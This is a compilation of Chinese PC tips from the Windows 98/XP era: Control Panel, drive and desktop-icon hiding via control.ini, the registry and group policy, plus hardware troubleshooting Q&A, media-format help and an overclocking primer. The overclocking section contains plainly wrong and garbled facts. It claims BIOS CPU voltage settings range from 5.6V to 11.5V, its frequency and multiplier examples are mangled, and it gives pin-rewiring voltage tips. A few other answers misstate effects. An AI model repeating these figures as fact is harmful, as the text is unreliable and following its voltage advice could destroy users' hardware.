    答：原来的那种老板子，确实有很多支持USB设备的，但是它们仅仅是“支持”而已，并没有提供实现USB连接的电缆和接口，你是无法连接USB设备的。你实现USB连接有两个方法，第一就是找你这款主板专用的USB连接线，不过这种连接线非常少；第二就是另外买一个PCI接口的USB接口卡，这是最简单的实现USB连接的方法了。

    7、关于双头显示的疑问

    问：我有一台主机，两台显示器。我想用两个鼠标来同时控制这台主机，并且两台显示器显示不同的画面。请问，我要如何设置才能达到这样的效果，有无此类软件来实现我的想法？

    答：您的确是可以实现两个鼠标控制同一台主机，最简单的方法就是一个用USB口鼠标，另一个用PS/2口鼠标，或者使用两个USB鼠标。如果您想要实现两个显示器显示不同的内容，您可以使用双头显卡来实现这个功能，具体的操作请您参看显卡说明书。


隐藏控制面板中的选项

《一键清理系统垃圾》

隐藏控制面板中的选项

    控制面板本身有一个配置文件──control.ini，通过改动此文件可达到这一目的。此文件在C盘Windows目录下，用写字板就可以打开它。

    具体为：在control.ini中增加[don'tload]字段，在其后跟上*.cpl=no(*表示相对应的选项)，即表示该选项不在控制面板中显示。

    [don'tload]

    joystick.cpl=no 表示隐藏“游戏控制器”

    midimap.drv=no 表示隐藏“区域设置”

    access.cpl=no 表示隐藏“辅助选项”

    appwiz.cpl=no 表示隐藏“添加/删除程序”

    desk.cpl=no 表示隐藏“显示”

    inetcpl.cpl=no 表示隐藏“Internet”和“用户”

    intl.cpl=no 表示隐藏“区域设置”

    joy.cpl=no 表示隐藏“游戏控制”

    main.cpl=no 表示隐藏“打印机、键盘、鼠标、输入法、字体”

    mmsys.cpl=no 表示隐藏“多媒体、声音”

    modem.cpl=no 表示隐藏“调制解调器”

    netcpl.cpl=no 表示隐藏“网络”

    odbccp32.cpl=no 表示隐藏“32位ODBC”

    password.cpl=no 表示隐藏“密码”

    powerefg.cpl=no 表示隐藏“电源管理”

    sticpl.cpl=no 表示隐藏“扫描仪与数字相机”

    sysdm.cpl=no 表示隐藏“系统”和“添加新硬件”

    telephon.cpl=no 表示隐藏“电话”

    themes.cpl=no 表示隐藏“桌面主题”

    timedate.cpl=no 表示隐藏“日期/时间”

    tweakui.cpl=no 表示隐藏“TweakUI”

    这样控制面板中所有选项都被隐藏。如不想隐藏，请取消相对应的选项。


隐藏驱动器一法

《一键清理系统垃圾》

隐藏驱动器一法

    隐藏驱动器是我们对硬盘上重要的文件资料进行保护的一种方法，除了我们常见的修改注册表隐藏、用分区魔法师(PQ)隐藏等方法外，在Win 2000/XP中，通过下面的方法我们也可以轻松实现对硬盘驱动器和光盘驱动器的隐藏：

    在“我的电脑”上击右键，选“管理”，打开“计算机管理”窗口，在左边目录树中展开“存储→磁盘管理”，便可在窗口右边看到所有的磁盘分区了。选中要隐藏的分区(卷)，执行右键菜单中的“更改驱动器名和路径”命令，便会弹出如图所示的对话框，按下“删除”按钮，系统弹出“删除卷的驱动器号可能会导致程序停止运行。确实要删除这个驱动器名吗？”若确认对话框，点击“是”把这个驱动器名删除，这样就可把个驱动器隐藏起来了。若不希望用户使用光驱在电脑上安装软件、打游戏，也可以用这个方法来实现对光驱的隐藏。

    要取消隐藏，只要回到“计算机管理”窗口，恢复已删除的驱动器名即可。按上面的方法选中已隐藏的驱动器进行操作，在“更改驱动器名和路径”对话框中单击“添加”按钮，然后在“指派以下驱动器号”中选定一个驱动号，点击“确定”就可把驱动器还原了。

    (注：用这个方法不能隐藏系统卷和启动卷。)


隐藏添加删除程序

《一键清理系统垃圾》

隐藏添加删除程序

    有些时候为了防止误删除软件，需要屏蔽控制面板里的“添加/删除程序”项目，在Win XP中可以通过以下两种方法来实现：

    方法1：注册表法
    打开“注册表编辑器”，展开分支“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer”，新建一DWORD值，取名为“DisallowCpl”，赋值为1；然后新建 “DisallowCpl”项(主键)，在该项中新建一字符串值，取名为1，赋值为“Appwiz.cpl”，注销后重新登录，再进入控制面板，点击“添加/删除程序”系统就会提示“这些控制面板选项不可用”。(秦飞)

    方法2：组策略法
    在“开始→运行”中键入“gpedit.msc”，打开“组策略”，依次展开“用户配置→管理模板→控制面板→添加/删除程序”，双击“删除‘添加/删除程序’程序”项，在弹出窗口中勾选“启用”即可。
    此外，在“添加/删除程序”分支中还可以对“添加或删除程序”窗口进行个性化设置，如隐藏“添加新程序”选项卡等。


隐藏桌面‘回收站’的两个方法

《一键清理系统垃圾》

隐藏桌面‘回收站’的两个方法

开始--运行 输入regedit，打开注册表，找到
1) HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum(没有该项则新建)
在该项下新建一个DWORD值，并命名为{645FF040-5081-101B-9F08-00AA002F954E}，修改其参数为1即可；

2) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
将{645FF040-5081-101B-9F08-00AA002F954E}项删除便可重新登录后生效


隐藏桌面所有图标

《一键清理系统垃圾》

隐藏桌面所有图标

    在开始－运行输入regedit进入注册表，找到子键“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer”，新建“DWORD”值 “NoDesktop”，其值为“1”。重新启动系统后，会发现任务栏的快速启动图标消失了。


影音视频播放中出现的常见问题集锦

《一键清理系统垃圾》

影音视频播放中出现的常见问题集锦

    网络上的影视、音乐一直深受网民的喜爱。随着人们对这些媒体播放需求的不同，出现了很多新的媒体播放格式及技术，也许你已经发现传统的播放工具已不能满足各种文件格式的播放需求。下面是众多网友在音、视频播放过程中遇到的一些典型问题，是否也正是你百思不得其解的难题呢？

    问：前不久下载了一个600MB的RMVB格式文件，利用Windows Media Player播放时却提示格式不支持，请问还有什么办法吗？

    答：回答这个问题前我们不妨先来看看什么是RMVB格式。所谓的RMVB格式是在RM格式上升级延伸而来的，它打破了RM格式的平均压缩采样方式，使在静态画面中采用较低的比特率而在动态画面中则用较高的比特率，这样既达到了压缩的效果，又最终让视听趋于DVD品质的完美效果。由于它采用了全新的VBR编码技术，因此播放器必须安装RealVideo 9.0以上的解码器才可以正常播放。

    问：为什么我用RealOne Player和Windows Media Player都打不开MKV压缩格式的文件？

    答：首先，MKV不是一种压缩格式，而是一种电影封装格式，它以支持多种格式的音/视频、多音轨、SSA/ASS字幕等功能越来越受到人们的关注。目前，要播放MKV格式的电影，可以通过MyMPC来实现。MyMPC的下载地址：http://www.onlinedown.net/soft/23571.htm。

    问：上次在看一部电影时，因为突然有事而中止了播放。回来想再接着看时却发现无法拖动播放时间条，因此，我不得不又重头再看。请问这是为什么？有什么办法可以解决吗？

    答：相信这个问题很多人都遇到过。出现这种情况确实很让人苦恼，其实这种情况多是因为文件损坏而导致的，只要通过修复工具进行修复操作就可以了。对于RM格式的文件，可以使用“RM修复器”来修复，下载地址：http://www.onlinedown.net/soft/19928.htm。如果是ASF或WMV等微软所制定的网络串流多媒体标准格式，可以利用“ASF Tools”来修复，下载地址：http://www.onlinedown.net/soft/3788.htm。如果是AVI格式的视频文件，可以使用“DivFix”来修复，其下载地址：http://www.onlinedown.net/soft/20.htm。

    问：为什么我在播放Dvdrip格式的影片时出现画面与声音不同步的现象？

    答：出现这种情况可能是因为你的计算机运算速度太慢了，解决方法就是提高计算机配置。除了计算机硬件原因外，还可能是播放工具设置不当造成的画面停顿现象，此时，可以利用Windows Media Player打开Dvdrip文件，然后依次单击“文件→属性→高级”命令，在打开的界面中可以查看到当前Dvdrip所使用到的所有插件，双击列表中相应的解码插件进入属性控制面板，然后将“CPU(Quality)”项的小滑块拖拽到最左边(降低CPU的占有率)，问题即可得到解决。

    问：请问在播放Dvdrip文件时如何让其同时显示英文字幕？

    答：要想给Dvdrip添加英文字幕，可以采用外挂的形势来实现。播放外挂字幕当然要使用专用的字幕播放插件，目前最有名的字幕插件首推VSFilter，对于图形字幕，它提供了语言选择功能，通过系统托盘区中的VSFilter图标，即可选择添加字幕语言，下载地址：http://www.onlinedown.net/soft/28519.htm。

    问：在网上下载了很多RM格式的电影，但在播放时却没有字幕显示，在看国外大片时感觉非常吃力。请问有什么办法可以添加字幕吗？

    答：遇到这种情况，有人可能试用VirtualDub和VobSub的插件来给影片添加字幕，结果显然不能成功，因为该组合只适应于AVI文件格式的影片，而不能直接给RM文件添加字幕。如果要给RM格式的影片添加字幕，可以利用Windows Media Play Classic来实现，下载地址：http://www.onlinedown.net/soft/2267.htm。

    问：为什么下载AVI格式的文件，用Windows Media Player却打不开？

    答：出现这种情况可能是因为这些AVI在制作时，是由DivX生成的MPEG4压缩文件时借用了AVI扩展名而造成的，由于不是标准的AVI文件，所以导致Windows Media Player不能播放的现象。因此要播放这些文件时，只要安装MPEG4解码驱动程序就可以了，同时也可以利用DivX Player等播放工具来播放。

    问：现在很多影片都是双语版，利用RealPlayer播放时总是同时播放两种语言，很难听清对白。请问，在RealPlayer播放时如何关掉一个声道？

    答： RelaPlayer不具备声道调节功能，如果影碟的音频格式是立体声音乐，可以通过系统工具栏中的“音量控制”来实现声道调节。首先，双击系统托盘区的小喇叭，打开“音量控制窗口”，在“音量控制”一栏中，用鼠标将“平衡”滑动条拖到最左侧即可进行声道调节。


硬件冲突”的检查处理方法

《一键清理系统垃圾》

硬件冲突”的检查处理方法

    “硬件冲突”是两个（或多个）设备使用相同的IRQ（中断）、DMA通道、I/O地址时，导致一个（或多个）设备无法正常使用的故障现象。在电脑上新安装某种硬件设备以后，常常会出现鼠标、MODEM、声卡等设备无法使用或无法登录网络的故障现象，出现这种情况大多是发生了“硬件冲突”。
#1　　一、“硬件冲突”检查方法
    检查“硬件冲突”可以通过“设备管理器”选项中的“资源列表”进行，方法如下：
    1.选择“开始/设置/控制面板/系统”，打开“系统属性”对话框，在“设备管理器”选项的“资源列表”中，分类列出了当前计算机上的所有设备。想检查某一指定设备时，须单击“资源列表”中类别条目前的“＋”号将其展开，下面列出了相应类别的所有设备。当某设备无法使用时，“资源列表”中可能就会出现以下几种情况：
    ·设备条目前有一红色的“×”号，说明该设备无效，当前无法正常使用。
    ·设备条目前有一黄色的“？”号，说明该设备存在问题，无法正常工作，产生的原因可能是设备驱动程序安装不当，也可能是存在硬件冲突。
    ·设备条目前一带圆圈的蓝色“！”号，说明该设备存在，基本能够工作，但系统认为设备有问题，例如能正常工作的非即插即用设备。
    2.在“资源列表”中双击设备条目，即可打开该“设备属性”对话框，在“设备属性”对话框“资源”选项的“冲突的设备列表”中，会给出与当前设备冲突的对象及冲突的资源内容。
    ·有些设备没有“资源”选项，表明该设备目前未使用资源。
    ·如果“资源”选项中有“手工配置”按钮，并提示设备存在冲突或其他问题，已被禁用。可根据提示内容检查处理。
    ·如果系统提示资源设置不符合任何已知配置，请查阅设备的使用说明书，如大多非即插即用SCSI卡、网卡、MODEM需占用指定的中断和I/O地址。
    3.对有些设备（如PCI网卡），用上述方法无法检查到资源冲突，可选择“开始/程序/附件/系统工具/系统信息”，打开“Microsoft系统信息”窗口，双击左边窗口“系统信息”框中“硬件资源”条目前的“＋”号将其展开，能检查到资源冲突。
#1　　二、“硬件冲突”排障方案
    检查到硬件冲突后，建议按以下方法处理：
    1.如果某一设备在“资源列表”中出现两次，而实际上只安装了一个这类设备，请将出现两次的同一设备均删除，重新安装该设备驱动程序。删除的方法是在“资源列表”中选定该设备后，按“删除”按钮。
    2.带有黄色“？”号的设备如果无“资源”选项，大多是该设备的驱动程序安装不当或驱动程序版本不兼容导致，请将其删除并重新安装驱动程序（注意检查驱动程序的版本和兼容性）。
    3.如果“冲突的设备列表”中列出的冲突是“系统保留”类型的硬件冲突，这种特定设备所使用的资源冲突很可能不会出现问题，如果不影响设备的使用，可以忽略这种资源冲突。但如果上述冲突影响设备的使用，请在“资源列表”中双击“计算机”打开“计算机属性”对话框，在“保留资源”选项上，选择发生冲突的资源类型后，单击“设置”列表中的特定资源，将其删除。
    4.如果两种设备使用了相同的资源，可采取以下方法处理：
    方法一：更改其中一种或两种设备的资源，通常可以解决问题，方法如下：
    （1）在“资源列表”中双击该设备，打开“该设备属性”窗口，在“资源”选项上，查看“冲突的设备列表”，确定哪些资源设置与其他设备冲突。
    （2）清除“使用自动的设置”复选框。
    ·如果“使用自动的设置”复选框为灰色，则该硬件的设置不能更改，如果该硬件是非即插即用的设备，须要通过调整硬件接口卡上的跳线，方能更改。
    ·有些接口卡使用软跳线，如使用UM9008芯片的NE2000兼容网卡，须运行其配套软盘中的SETUP.EXE文件更改其使用资源。
    （3）在“资源类型”和“设置”的列表框中，双击与其他资源发生冲突的设置（或按“更改设置”按钮），打开相应资源的“编辑资源”对话框，利用资源“值”选择框右侧的滚动条，更改资源设置“值”。
    更改资源时注意阅读“冲突信息”栏目中的信息，选择不与其它设备冲突的资源“值”，以后连按“确定”按钮，根据提示重新启动计算机。
    ·如果资源“值”的选择范围较少，可在“资源”选项“设置的依据”下拉选择框，选择其它“基本设置000X”（X为基本设置编号）。
    方法二：如果所有设置都与其他设备冲突（例如安装设备和接口卡较多的计算机，就有可能出现中断号不足，从而导致IRQ冲突的故障），可采用以下方法禁用暂不使用的设备：
    （1）禁用“即插即用”设备：在“设备管理器”选项卡上，双击该设备（或选择该设备后按“属性”按钮）。打开该设备属性对话框，在“常规”选项中，选定“在此硬件配置文件中禁用”复选框，单击“确定”，按提示重新启动计算机。
    （2）禁用非“即插即用”设备：在“资源列表”中选定需禁用的设备，然后单击“删除”按钮将其删除。
    （3）在BIOS中关闭某些不使用的设备：如COM1、COM2、LPT等，注意关闭USB有可能导致死机。
    方法三：早期网卡使用软跳线设置，出厂设置使用IRQ3，与COM2发生IRQ中断冲突，如果你不使用COM2，可在BIOS中将“Onboard UART Port”项设置为Disabled，关闭COM2。也可运行网卡程序软盘中的设置程序，将网卡设置为非PnP模式（jumpless），设置中断号和I/O地址为系统未占用的地址；并在BIOS中将相应中断号由PCI/ISA改为Legacy ISA。
    方法四：有些PCI网卡会强行占用IRQ10，与一些使用IRQ10的显示卡发生IRQ冲突，可在BIOS中将“Assign IRQ For VGA”项设置为“Disabled”，不给显示卡分配固定的中断。
    方法五：在系统安装外设及接口卡较多时，再按上述方法检查，你会看到从0～15的所有中断均被占用，这种中断资源不够的情况，可按下述方法处理：
    ·在BIOS中关闭不使用的COM口。
    ·替换占用中断较少的接口卡，如雅马哈724占用两个中断，而雅马哈719仅占用一个中断。
    ·拔去不使用的接口卡。
    5.有时“资源列表”中未列出任何冲突，但你的设备还是无法正常使用（实际存在硬件冲突），可能是该设备通过其它设备接口占用系统资源，如调制解调器是通过COM口占用系统资源，如果你未安装相应的COM口或相应COM口与其它设备存在资源冲突，则会导致调制解调器无法使用。
    6.如果你的设备未出现在“资源列表”中，可能是其它设备占用该设备的资源，导致Windows无法发现该设备，须按前述内容禁用或取消与之冲突的设备。例如：当你在BIOS中开启主板红外线接口（占用COM2、IRQ3）时，如果有非即插即用的接口卡（如MODEM）占用了COM2或COM3（均可能使用IRQ3），则会导致系统无法发现红外线接口。
    “资源冲突”是Windows系统的常见故障，本文仅讨论了一般检查处理方法，解决不同设备间的“资源冲突”处理方法有可能不同，需要你在实践中努力，方能一一排除故障，提高你的DIY能力。


硬件学堂之---谈超频的概念及方法

《一键清理系统垃圾》

硬件学堂之---谈超频的概念及方法

提及超频，已经在各位DIY玩家之间抄得沸沸扬扬，基于每位DIY玩家所持的观点不同，对超频的看法也各持己见。笔者最近看到硬件网站有关超频 方面的文章，每篇文章所提出的理论都各有千秋，有的说超频对CPU影响不大，只要做好散热的措施也没多大的问题，还会提升许多频率；也有的说超频会减少了CPU的寿命，如果严重些CPU也会被烧坏等说法。初学者顿时迷惑住了，是该超呢？还是不超呢？都说得有道理。现时很多DIY玩家都是些学生、超频爱好者等，身上的钱本来就赚得辛苦，烧坏了可就完了。

超频关键字

超频：超频是指利用CPU标准工作频率的余量，使CPU的工作频率高于本身的标准频率, 从而达到提高系统性能的目的。一般可以通过加高主板电压等方法来提升CPU频率。随着CPU的性能以每18提升一倍的速度，主板的功能也越来越丰富，超频也越来越简单。现在市场部分主板已经可以通过软超频（即用BIOS设定电压值）的方法来提升CPU频率了。很多不良经销商通常就是利用超频来出售高性能假冒伪劣的CPU。如果电压加高了极有可能将CPU烧掉。所以在超频时请仔细阅读主板说明书及相关资料。如果不甚熟悉，最好邀请一个老鸟在一旁指导，切不可在不熟练地情况下超频，否则超成CPU损害，后悔也不及了。

频率：　频率是描述周期性循环信号包括脉冲信号在单位时间内所出现的脉冲数量多少的计量名称；频率的计量单位是Hz（赫）、kHz（千赫）、MHz（兆赫）、GHz（千兆赫）。其中1GHz=1000MHz，1Mhz=1000kHz，Khz=1000Hz。频率的提高对CPU中的元件寿命是不会有影响的，可是如果将频率提高后，却会产生一定的热量。然而热量对CPU的元件损害是极大的。所以在超频前需考虑好散热的措施，以免因温度过高，对CPU造成损害。

主频、外频、倍频和运算速度：主频是计算机系统的工作频率，外频是指计算机系统的时钟频率，至于倍频则是指CPU外频与主频相差的倍数（现在很多新款的CPU开始采用锁频来限制超频，不过一山还有一山高，破解锁频的方法网上处处都可以看得到。）通常主频等于倍频乘以外频，如P4 2.4GB的主频等于18（倍频）等于133Mhz（外频）。通过提高外部时钟频率（外频）来提高CPU的主频。计算机的传输速率运算公式为外频乘以数据总线宽度除以8 betys。

超频的方法

贴脚法：贴脚法是针对以前比较老、没有外频跳线或设定的主板、转接卡，这样的话改变外频频率几乎无法可循。不过可以通过对CPU的引脚进行适当时调整，同样可以提高外频率，如早期的Slot1的赛扬，可以把CPU金插指是的B12脚贴上透明胶，然后再将CPU插进去，便可以将CPU外频改为100MHz。其实还可以通过转接卡将外频进行转换。

调整电压法：要提高CPU的工作电压能让传输信号比其噪声更高，利于CPU的工作稳定。在实际中操作中，提高CPU的工作电压几乎成了最主要的超频措施。一般调整CPU工作电压的方法有：

1、主板BIOS设定：目前市场有很多主板都支持BIOS超频，即软超频。只要把打开计算机并进入BIOS后，修改CPU工作电压的参数，便可以轻松达到超频的效果。一般调整范围在5.6V~11.5V之间。当CPU无法正常稳定的工作时，同样可以通过改变CPU工作电压参数来提高CPU的稳定性。

2、转接卡跳线法：可以利用CPU的VID0、1、2、3、4这五个脚的电平状态来控制主板为CPU提供电压的大小，当使用转换卡时，可以将其五个脚做成跳线的形式，根据自己的需要来设定。具体的操作方法可以参阅转接卡说明书。

3、主板跳线法：通过改变主板跳线的方法也可以为CPU提供电压的大小。这种方法很多情况下用得比较频繁。只要根据主板说明书上的电压与跳线对应的关系，改变跳线插头的布局便可以达到提高电压的方法。如果电压改得不对，CPU不仅不能工作，也有超烧的危险。所以在超频一定要仔细阅读主板说明书。

主流超频方法

P4超频方法：

1、 主板加压法：现在很多主板都支持CPU加压功能，针对P4，主板往往提供了±0.1电压调整范围。如CPU为0.18微米的P4，主板就会在1.7V的基础上增加0.1V电压来达到1.8V的电压。可以通过改变主板中BIOS的电压参数或者主板上的跳线提高电压。如图1：

图1控制CPU电压的DIP开关

2、CPU电平设定法：针对P4来说，CPU底部有五个传递CPU初始电压信号的管脚，它们分别为VID0、VID1、VID2、VID3、VID4，并且它们分别连接到电源的正极（Vcc）、地（Vss）等。这五个针脚的电位只能设定为0（接地）和1（先接电阻后接电流）两种，计算机在开机时就将这串数字输出为对应的电压。如图2：

图2 VID针脚供电状况

这时只要把这五个VID信号电平改变，便可以达到提高电压的要求，例如P4，图3为VID针脚的位置：

图3

可以将VID针脚电平为0的一端接地，VID针脚电平为1通过电阻接到电源正极，那么电平便分别接成1、0。如P4，将对应的VID4~VID1的信号00110中的VID2和VID1的值由1改为0，则会输出00000信号。电压就会由原来的1.7V提高到1.8V。具体方法可以参阅http://www.pconline.com.cn/pchardware/diyheaven/cpu/10206/69789_3.html。关于超频的方法还有很多很多，在此就不便多说了，详细内容各大网站都有相关资料。希望大家能从本文学习到一些关于超频的知识。最后给看大家一段录像：http://www.amddiyoc.com/AMD/AMDThermal video.zip


硬件疑难杂症综合诊治系列（八）

《一键清理系统垃圾》

硬件疑难杂症综合诊治系列（八）

    1、显卡双显不可用问题

    问：我的480T的显卡在选择输出设备时，电视这一项不可选是灰色的，请问是为什么？我的操作系统是WinXP，驱动也没错。

    答：其实这是正常现象，除非您在开机之前就把电视机的电源打开，并且视频输出线也要先连接完好才可以。这样的话，当您选择“检测屏幕”的时候，才会检测到电视机，然后电视机这一项才可以使用。

    2、光驱预读问题

    问：我的主板是ASUS P3B－F的，ASUS　34速光驱，有这么一个问题，在桌面上右击“我的电脑”点击“属性”弹出一个属性框，点击“性能”、进入“文件系统”属性后，CD－ROM的高速缓存为“小”，最佳访问方式为“不预读”，每次调改回来时只要重新启动后还是个老样子，请问这个问题如何解决？

    答：一般出现设置不成功的问题很可能是和您主板的驱动没有安装成功和系统注册表混乱造成的。您可以试着重新安装一下主板的驱动和把注册表文件替换为以前备份过的即可。关于注册表文件还原的方法如下：进入纯DOS模式下，输入scanreg，选择日期最靠前的一个备份文件，然后恢复后重启即可。

    3、局域网打印问题

    问：我通过局域网共享打印机（同一个工作组），联接打印机的计算机是Windows 98，从安装Windows 2000/XP的计算机无法打印文件了，不知如何设？另外，我们这儿服务器上安装了一个系统，但是经常出现一些电脑打不开这个系统，还提示说：“服务器拒绝该权限”，而另外一些电脑能使用该系统，可又不能上网，请问是什么原因？该如何解决？

    答：这是由于采用了不同的操作系统，内置的用户账户和网络不统一造成的，您可以使用WinXP安装光盘，在所有机器上都重新设置一下网络工作环境。通过这样的设置，所有的电脑都在统一的网络环境下工作，问题会很快就解决掉的。
    4、网络共享问题

    问：请问如何去掉Win2000中“网上邻居”共享中的“打印机”和“任务计划”这两个共享项？在Windows 2000共享文件夹中，如果我希望对方“完全”使用我的共享文件，也就是可以修改或写入，请问如何像Windows 98共享一样设置口令，以防止其他人对共享文件的误删或病毒的侵入？

    答：您可以在桌面“网络邻居”上单击右键，选择“属性”，然后打开网络连接，选择您当前的网络连接，然后查看属性，再直接卸载这两项共享任务就可以了。关于共享问题，您可以把磁盘格式化为NTFS格式，然后为每个用户设置不同的权限，这样就可以解决他人对文件误删和病毒侵入的问题了。

    5、下载WMV文件的方法

    问：由于本单位的安装了ADSL，我经常上网看一些电影，可不知道怎样把它们下载下来。我翻阅了《中国计算机报》的许多资料，上面重点介绍了RM 和ASF 格式是如何下载的，没有介绍WMV格式电影如何下载。由于本人经常看一些WMV 格式的电影，请问有没有什么方法能够下载WMV文件？

    答：您可以使用ASFRecorder V1.1这个专门用来下载 ASF、Wma、Wmv 格式流文件的工具。它除了能把ASF下载回来外，也支持ASF文件的索引格式ASX文件，它能把隐藏在 ASX里面的真正流部分找出来，甚至还可以设置代理等等，功能强大之余使用也非常方便。只要在其“File”选单下面选“Open URL”再输入流节目的地址后，就可以回到主界面按那个三角形符号开始下载了。

    由于 ASFRecorder 采取了独特的技术模拟正常播放，然后把流服务器端调制发出的流数据重新组合成文件，所以它的出现严重威胁了 ASF 等流文件的版权问题，在微软对软件作者施加压力后这个软件已经停止开发了，幸好作者公开了这个软件的源代码。最近国内的Yaan2同志在 ASFRecorder 代码的基础上加以改进做出了ASFR+，这个软件在 ASFRecorder 的基础上加上了分段下载、修复损坏 ASF 文件、多线程下载ASF文件等功能。最近还出现了另外一个流节目下载软件 Stream Download Project v1.4 ，它的功能和 ASFRecorder 非常的相似，一样是只支持 ASF 和 WMV 格式，一样不支持多线程下载和续传。但它毕竟是比较新的软件，在一些 Streambox Vcr 都不能成功下载的情况下，用这个软件试试或者会让你有柳暗花明的感觉。 这个软件使用上也相当简单，在最底下的输入框输入你要下载的流节目的路径，然后按GO按钮就可以了。


硬件诊室

《一键清理系统垃圾》

硬件诊室

《中国电脑教育报》王磊

    问：我的计算机是板载声卡，但近来不能发声，重装安装驱动程序后，问题依旧。请问原因及解决方法？

    答：首先请检查一下系统中是否存在病毒。如果不是病毒在作怪，则可能是声卡在主板的BIOS中被禁用了。你可以在BIOS的“Advanced Chipset Features”项目中将“Onchip Sound”选项由“Disabled”改为“Auto”(不同主板此项的叫法可能不同)，这样即可解决问题。另外，如果声卡处在非标准外频下（对CPU超频时未采用标准外频），也会导致声卡无法正常工作。解决方法是让声卡处在标准外频下工作，即不对CPU进行超频，或采用标准外频对CPU进行超频并通过分频设置将声卡的外频锁定在33MHz。如果以上三种方法都不能奏效，那么问题应该出在主板上，请与经销商联系。

    问：一台CRT显示器在1024×768的分辨率下工作正常。但是在玩一些游戏时，分辨率会自动切换到800×600或640×480，这时画面就会出现偏移或扭曲。请问出现这种问题的原因及解决方法？

    答：许多朋友在使用显示器时都有一个不好的习惯，就是仅对桌面分辨率的显示画面进行调整（如1024×768）。这样在平常使用时一切正常，可当运行某些游戏软件时，因游戏软件有其自定的分辨率模式（如800×600或640×480），如果它们支持的分辨率模式与桌面分辨率不同，那么就会自动做出调整。但由于此前大家并没有对桌面分辨率以外的显示画面进行过调整，所以就会出现画面偏移或扭曲的现象。

    了解了问题产生的原因，解决起来就很容易了，在运行游戏软件之前，分别对不同分辨率下的显示画面进行调整即可。

    问：本人爱机的CPU是Tualatin赛扬 1.0GHz，但维修一次后就成了667MHz，CPU是被调换了吗？

    答：应该不是。估计是修理人员把你的CPU的外频设置错了，Tualatin赛扬 1.0GHz的外频是100MHz（100MHz×10），如果外频被设为了66MHz，那么正好符合你所说的情况（66MHz×10=667MHz）。你可以在主板的BIOS中或通过主板上的跳线把CPU外频设置为100MHz，问题就解决了。

    如果还是不放心的话，你可以登录到www.ccidnet.com/soft/cce，下载一个Intel Processor Frequency ID Utility软件，它可以检测出你的CPU的真实频率（如图）。


硬件诊室

《一键清理系统垃圾》

硬件诊室

《中国电脑教育报》王磊

    问：最近新买了一台BenQ牌的DVD-ROM，在附赠的PowerDVD软件的声道类型设置中，发现只支持两个喇叭。而我的声卡支持四声道，音箱也是4.1的，请问是何原因？

    答：PowerDVD有支持六声道（六个喇叭）、四声道及二声道三种版本。BenQ DVD-ROM附赠的版本为二声道的版本，所以软件的声道类型设置中仅显示支持两个喇叭。

    你可以购买一个支持四声道版本的PowerDVD软件，这样就能让你的系统发挥出应有的效果了。

    问：我的显示器在刚开机时水平和垂直画面的大小会和平时使用时不同，但稍后又能恢复正常，请问是何原因？

    答：这种现象在CRT显示器中非常普遍，通常称为显示器的温漂效应。由于显示器启动之后，显像管及内部电路需要有个预热过程，反映到显示画面上，就会有轻微的水平或垂直方向的图像位移。

    对CRT显示器来讲，这是正常现象，用户不用担心，一般在开机后很短的时间内就会恢复正常。温飘的幅度一般来讲在半厘米之内都是可以接受的，如果温飘过大，建议还是另外选一台。

    问：ADSL可以提供局域网接入吗？

    答：可以，方法有三种：

    1、将直接通过ADSL连上网的那台主机设置成代理服务器 ，然后本地局域网上的客户机通过该代理服务器访问外部信息资源，这种方法的好处是需要申请 一个账号或一个IP地址，本地客户机可采用保留IP地址。

    2、采用专线方式，为局域网上的每台计算机向电话局申请1个IP地址，这种方法的好处是无须设置一台专用的代理服务网关，缺陷是鉴于目前技术的局限，电话局只能提供最多16个IP地址给局域网。

    3、在ADSL后面接一个路由器，向电话局多申请一段IP地址给局域网的计算机，在电话局 给该段地址设置路由之后即可上网，这种方法的好处是局域网计算机的数目不受限制，但是要多加一台路由器。

    4、还有一种客户端具有路由、防火墙功能的ADSL Modem可以完成以上三种方法的任何一种，而不需要添加任何代理服务器或路由器，但目前此类产品还比较少见。

    问：当我使用CD-ROM玩游戏时，如果超过15秒没有动作，爱机就如同进入了睡眠状态。当我恢复动作时，爱机就会读取CD-ROM中的光盘，同时鼠标的动作似乎滞后了1~2秒。我在另一台计算机上玩这个游戏完全没有这种现象，请问是何原因？

    答：首先请查看你的CD-ROM驱动使用的是实模式还是保护模式（实模式的驱动是从Config.sys和Autoexec.bat文件中加载的，而保护模式是Windows系统自动调用的，您无法直接看到）。

    如果使用的是实模式，一定要确认使用了Smartdrv.exe(否则，驱动器将在没有缓存的状态下工作)。如果使用的是保护模式，请检查“控制面板”中的性能设置（控制面板→系统→性能→文件系统→CD-ROM）。将CD-ROM的“最佳访问方式”设置为“四倍速或更高速”（如图）。通过以上更改，问题应该可以解决。

    问：在安装VIA 4IN1驱动的过程中，系统提示找不到viagart.cat文件，请问该怎么解决？

    答：解决这个问题的办法很简单：在4IN1驱动的文件夹下查找viagart.inf和viagart.vxd两个文件，用WinZip等压缩软件制作成一个压缩文件，并命名为viagart.cat，保存到4IN1驱动目录下的AGP子文件夹中。当系统提示找不到viagart.cat文件时，手动把安装目录指向AGP目录即可。

    问：我的爱机采用了512MB内存，但依然会出现“内存不足”的提示信息，不知是何原因？该如何解决呢？

    答：在Windows系统中，这个问题和显示卡驱动程序有关。Microsoft提供的解决方法有两个：一是在System.ini文件中使用MaxFileCache设置，以将Vcache（The Windows 32-bit protected-mode cache driver）使用的最大内存数量减少到512 megabytes (524288KB) 或更少；另一个方法是使用系统配置应用中的高级排障设置来做一些限制。在这里再说一下问题发生的原因：Vcache将最大缓存大小定为800MB，对于AGP显卡来说，由于AGP aperture （在BIOS设置中可指定其大小）也要映射到系统主内存区域。所以如果Vcache使用800MB的最大上限，而AGP aperture设为128MB，那么应用程序还有多少可用空间呢？按照这种设置法，即使拥有928MB内存也会出现内存不足的情况。

    问：我的CD-RW在刷新Firmware时失败了，请问该怎么修复？

    答：在刷新CD-RW等光磁设备的Firmware时，如果系统提示找不到光磁设备或刷新失败，可使用“热拔插”的方法，即拔去光磁设备的电源线和数据线（一定要先拔电源线，否则可能会烧毁光驱），然后再分别插上（一定要先插数据线），重新运行刷新程序即可。


硬件诊室

《一键清理系统垃圾》

硬件诊室

《中国电脑教育报》练兵

